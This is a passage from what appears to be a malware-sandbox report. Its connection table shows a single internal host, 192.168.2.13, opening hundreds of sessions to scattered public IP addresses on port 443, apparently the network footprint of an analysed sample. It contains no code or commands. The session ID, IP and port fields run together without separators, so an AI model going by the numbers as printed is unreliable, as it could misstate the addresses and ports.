                                                  17078192.168.2.1348980219.188.128.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17079192.168.2.1359218152.25.125.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17080192.168.2.1360962141.240.62.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17081192.168.2.1335010106.48.113.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17082192.168.2.135710239.122.28.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17083192.168.2.1341834196.80.230.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17084192.168.2.1359734106.130.211.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17085192.168.2.1348202149.20.233.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17086192.168.2.1340434129.237.236.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17087192.168.2.1340282193.92.98.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17088192.168.2.1343536104.247.90.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17089192.168.2.1335180217.62.11.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17090192.168.2.1338596134.156.42.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17091192.168.2.135392238.222.30.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17092192.168.2.1347940115.171.128.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17093192.168.2.1345448120.57.76.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17094192.168.2.1341510170.97.252.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17095192.168.2.1340786189.50.236.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17096192.168.2.1347238147.194.170.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17097192.168.2.1335070160.169.37.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17098192.168.2.1360118173.128.73.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17099192.168.2.13565682.128.103.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17100192.168.2.1353420101.72.14.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17101192.168.2.1340094204.154.11.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17102192.168.2.1354622118.164.0.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17103192.168.2.1343268173.196.249.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17104192.168.2.135683893.83.245.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17105192.168.2.13402564.79.16.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17106192.168.2.1338666142.146.11.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17107192.168.2.134675676.61.213.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17108192.168.2.1338452138.97.217.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17109192.168.2.135197058.176.119.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17110192.168.2.1353316157.76.96.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17111192.168.2.1359906185.13.143.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17112192.168.2.135612640.3.232.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17113192.168.2.1335116176.194.90.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17114192.168.2.1349244222.74.143.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17115192.168.2.1342476152.146.198.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17116192.168.2.1340124112.78.161.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17117192.168.2.133940864.97.108.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17118192.168.2.1341218169.236.132.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17119192.168.2.1360434210.201.213.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17120192.168.2.133868653.44.142.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17121192.168.2.1341432108.121.242.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17122192.168.2.135345040.239.43.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17123192.168.2.1359210220.245.113.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17124192.168.2.1345530110.111.40.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17125192.168.2.1354340148.15.49.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17126192.168.2.134267858.39.159.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17127192.168.2.13419305.207.223.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17128192.168.2.135169084.246.209.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17129192.168.2.1356140174.103.152.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17130192.168.2.1337730200.213.131.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17131192.168.2.1352506188.139.119.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17132192.168.2.1345290152.251.238.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17133192.168.2.136027482.61.18.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17134192.168.2.134645453.171.151.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17135192.168.2.1349894144.157.131.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17136192.168.2.1360660153.69.33.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17137192.168.2.1342152122.98.28.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17138192.168.2.1357406161.14.218.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17139192.168.2.1356254203.62.233.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17140192.168.2.1342852125.231.26.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17141192.168.2.1343912222.175.108.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17142192.168.2.1360894105.15.165.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17143192.168.2.1346866180.230.162.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17144192.168.2.135076485.86.17.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17145192.168.2.1345128152.70.200.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17146192.168.2.1353066104.103.150.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17147192.168.2.1339240179.129.185.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17148192.168.2.134244634.153.207.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17149192.168.2.1355580163.43.63.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17150192.168.2.1352976223.88.148.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17151192.168.2.134325271.174.35.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17152192.168.2.135942680.190.193.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17153192.168.2.135387623.19.167.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17154192.168.2.136093631.31.145.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17155192.168.2.1355592204.133.62.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17156192.168.2.134606285.239.44.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17157192.168.2.1348380154.221.238.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17158192.168.2.1335038118.52.246.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17159192.168.2.1350154206.131.13.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17160192.168.2.135013637.207.226.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17161192.168.2.1357628119.180.23.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17162192.168.2.1337880128.131.14.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17163192.168.2.1343722200.116.179.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17164192.168.2.1346358132.237.125.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17165192.168.2.1344100209.175.150.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17166192.168.2.1340892212.8.137.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17167192.168.2.1347266115.184.153.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17168192.168.2.134116650.43.79.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17169192.168.2.1350072194.35.189.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17170192.168.2.1359466222.42.156.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17171192.168.2.134205292.234.6.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17172192.168.2.1344228181.127.168.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17173192.168.2.133693412.160.16.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17174192.168.2.133823888.202.229.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17175192.168.2.135034623.29.211.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17176192.168.2.13552465.5.117.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17177192.168.2.134575296.255.164.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17178192.168.2.1342882147.214.175.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17179192.168.2.1344738210.42.96.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17180192.168.2.133909034.165.140.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17181192.168.2.135176457.38.97.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17182192.168.2.13479544.81.105.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17183192.168.2.136000091.103.73.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17184192.168.2.1354864189.209.200.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17185192.168.2.134869034.127.125.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17186192.168.2.13540464.59.217.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17187192.168.2.1352390213.9.129.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17188192.168.2.134645812.52.102.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17189192.168.2.133480273.232.187.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17190192.168.2.1350282133.116.44.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17191192.168.2.135822219.24.85.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192192.168.2.1332908186.81.101.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17193192.168.2.134161074.220.41.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17194192.168.2.1334932160.62.43.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17195192.168.2.1355200145.61.89.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17196192.168.2.1350678153.247.208.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17197192.168.2.1343752180.238.68.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17198192.168.2.13517649.62.31.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17199192.168.2.1352408168.54.130.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17200192.168.2.135947263.80.241.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17201192.168.2.136087432.83.22.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17202192.168.2.1359786117.156.111.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17203192.168.2.1349388213.188.57.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17204192.168.2.133699034.18.82.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17205192.168.2.1348650206.92.186.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17206192.168.2.135272254.101.248.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17207192.168.2.133480679.47.10.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17208192.168.2.1347770194.97.0.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17209192.168.2.1350914157.85.221.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17210192.168.2.1350960158.231.217.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17211192.168.2.1338592159.143.19.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17212192.168.2.1358832125.166.218.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17213192.168.2.1351420101.148.189.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17214192.168.2.1340920196.214.173.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17215192.168.2.1344336124.227.216.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17216192.168.2.1344886167.0.19.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17217192.168.2.1344804109.131.242.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17218192.168.2.1339170223.237.41.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17219192.168.2.1355048182.120.15.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17220192.168.2.133672413.27.198.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17221192.168.2.1335226159.99.230.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17222192.168.2.1338950162.201.72.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17223192.168.2.1338686114.27.123.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17224192.168.2.1347388192.43.99.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17225192.168.2.1347812142.166.164.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17226192.168.2.13361924.199.152.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17227192.168.2.1342654203.116.185.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17228192.168.2.1357760121.63.214.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17229192.168.2.1353430189.149.226.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17230192.168.2.1359842118.87.20.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17231192.168.2.1341116125.220.60.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17232192.168.2.1349706113.71.62.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17233192.168.2.1358556161.149.164.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17234192.168.2.134085064.240.66.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17235192.168.2.1339264191.226.191.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17236192.168.2.134173683.126.168.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17237192.168.2.135715037.163.138.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17238192.168.2.1339670166.48.87.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17239192.168.2.1335852180.249.49.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17240192.168.2.1350192148.1.78.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17241192.168.2.1349086104.124.66.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17242192.168.2.1358494134.151.21.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17243192.168.2.1348162147.224.124.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17244192.168.2.1357484209.75.44.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17245192.168.2.134897812.194.175.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17246192.168.2.135544891.137.233.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17247192.168.2.13435422.197.45.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17248192.168.2.13395408.74.13.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17249192.168.2.135837618.18.241.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17250192.168.2.1356382205.118.51.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17251192.168.2.133580688.62.9.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17252192.168.2.13490442.62.2.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17253192.168.2.1351060216.39.83.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17254192.168.2.1350028177.191.243.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17255192.168.2.135901077.54.248.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17256192.168.2.133916252.206.208.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17257192.168.2.1357850213.155.17.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17258192.168.2.135041039.242.109.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17259192.168.2.135255097.162.16.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17260192.168.2.1354996109.81.129.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17261192.168.2.1342226126.23.201.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17262192.168.2.1344976159.168.36.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17263192.168.2.1349522115.49.113.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17264192.168.2.1357446176.65.27.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17265192.168.2.1347666222.95.6.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17266192.168.2.135186667.250.247.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17267192.168.2.133992699.183.105.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17268192.168.2.1338544125.112.70.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17269192.168.2.1343624148.166.18.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17270192.168.2.1335216143.121.136.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17271192.168.2.133828698.60.8.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17272192.168.2.1332960173.69.161.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17273192.168.2.1358290134.77.229.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17274192.168.2.1351012171.252.241.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17275192.168.2.1357532109.25.239.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17276192.168.2.134132466.97.199.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17277192.168.2.1336770198.207.169.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17278192.168.2.134343246.163.200.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17279192.168.2.134730844.226.126.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17280192.168.2.1336000129.77.255.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17281192.168.2.1338020177.191.133.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17282192.168.2.1336190210.78.79.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17283192.168.2.135382238.5.167.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17284192.168.2.1352544142.188.79.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17285192.168.2.1334618217.66.8.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17286192.168.2.133757099.208.150.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17287192.168.2.1339860204.109.239.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17288192.168.2.1338428110.32.195.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17289192.168.2.135371284.90.243.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
